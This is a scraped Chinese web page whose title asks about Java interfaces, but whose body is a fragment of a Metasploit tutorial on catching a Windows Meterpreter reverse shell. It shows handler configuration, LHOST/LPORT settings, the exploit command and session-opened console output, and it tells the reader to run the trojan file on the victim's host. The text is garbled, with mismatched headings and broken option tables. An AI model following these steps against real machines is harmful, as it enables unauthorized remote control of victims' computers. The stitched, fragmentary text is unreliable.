java中的接口是类吗
445
2022-10-10
Metasploit 生成***反弹shell(metasploit framework)
Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.221.243 yes The listen address LPORT 18609 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target(回显内容) (4)msf exploit(multi/handler) > set LPORT 12315 将端口修改为生成muma文件时设置监听的端口 LPORT => 12315(回显内容证明修改成功) (5)msf exploit(multi/handler) > show options查看gongji载荷的配置 Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.221.243 yes The listen address LPORT 12315(看这里端口已经更改了) yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target
(6)msf exploit(multi/handler) > exploit运行(在受害者主机别忘了运行你的muma文件)[] Started reverse TCP handler on 172.16.221.243:12315 [] Sending stage (179779 bytes) to 172.16.221.153[*] Meterpreter session 9 opened (172.16.221.243:12315 -> 172.16.221.153:50596) at 2018-04-27 15:17:12 +0800
[*] Meterpreter session 11 opened (172.16.221.243:12315 -> 172.16.221.153:50679) at 2018-04-27 15:37:31 +0800 出现以上内容即为成功
4.刚才说过图形化方便操作,接下来给大家介绍一些小操作
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~